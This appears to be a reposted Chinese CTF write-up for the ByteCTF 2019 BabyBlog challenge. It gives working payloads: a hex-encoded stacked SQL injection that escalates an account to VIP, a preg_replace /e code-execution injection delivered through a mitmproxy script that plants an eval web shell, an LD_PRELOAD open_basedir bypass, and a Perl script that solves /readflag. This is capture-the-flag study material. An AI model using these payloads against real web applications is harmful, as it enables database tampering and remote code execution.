刷题记录:[ByteCTF 2019]BabyBlog

Posted 20175211lyz

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了刷题记录:[ByteCTF 2019]BabyBlog相关的知识,希望对你有一定的参考价值。

刷题记录:[ByteCTF 2019]BabyBlog

题目复现链接:https://buuoj.cn/challenges
参考链接:https://eustiar.com/archives/576
ByteCTF 2019 Writeup - 天枢

知识点

二次注入+堆叠注入

注入点在edit的title

';SeT@a=0x757064617465207573657273207365742069737669703D3120776865726520757365726E616D653D277465737427;prepare execsql from @a;execute execsql;#

把自己的账号改成vip

php 00截断

要求:php版本小于5.3.4
用户输入的url参数包含%00经过浏览器自动转码后截断后面字符

preg_replace/e参数RCE

$content = addslashes(preg_replace("/" . $_POST[‘find‘] . "/", $_POST[‘replace‘], $row[‘content‘]));

从天枢那学了一招用mitmproxy解决蚁剑链接问题

from mitmproxy import http                                                    
                                                                              
class add_request:                                                            
                                                                              
    def request(self, flow) -> None:                                          
        flow.request.urlencoded_form['find'] = "/ex00"                       
        flow.request.urlencoded_form['replace'] = "eval($_POST['a'])"         
        flow.request.urlencoded_form['id'] = "1"                              
        flow.request.urlencoded_form['regex'] = "1"                           
        flow.request.cookies['PHPSESSID'] = "8192498e1b72a3004a2093fc26f10d28"
                                                                              
addons = [                                                                    
    add_request()                                                             
]

然后用error_log的LD_PRELOAD绕过openbase_dir

管道解题读flag

你以为这样就完了吗,可是glzjin不是一般的男人,他把readflag魔改了
CTF 2019 Mywebsql Echohub WriteUp
我手上没ida,就懒得看了,抄个exp

use strict;
use IPC::Open3;

my $pid = open3( *CHLD_IN, *CHLD_OUT, *CHLD_ERR, '/readflag' )
  or die "open3() failed $!";

my $r;
$r = <CHLD_OUT>;
print "$r";
$r = <CHLD_OUT>;
print "$r";
$r = eval "$r";
print "$r
";
print CHLD_IN "$r
";
$r = <CHLD_OUT>;
print "$r";
$r = <CHLD_OUT>;
print "$r";

以上是关于刷题记录:[ByteCTF 2019]BabyBlog的主要内容,如果未能解决你的问题,请参考以下文章

刷题记录:[SUCTF 2019]EasySQL (欠)

刷题记录:[SUCTF 2019]Pythonginx

刷题记录:[RCTF 2019]Nextphp

刷题记录:[EIS 2019]EzPOP

刷题记录:[强网杯 2019]Upload

刷题记录:[GWCTF 2019]我有一个数据库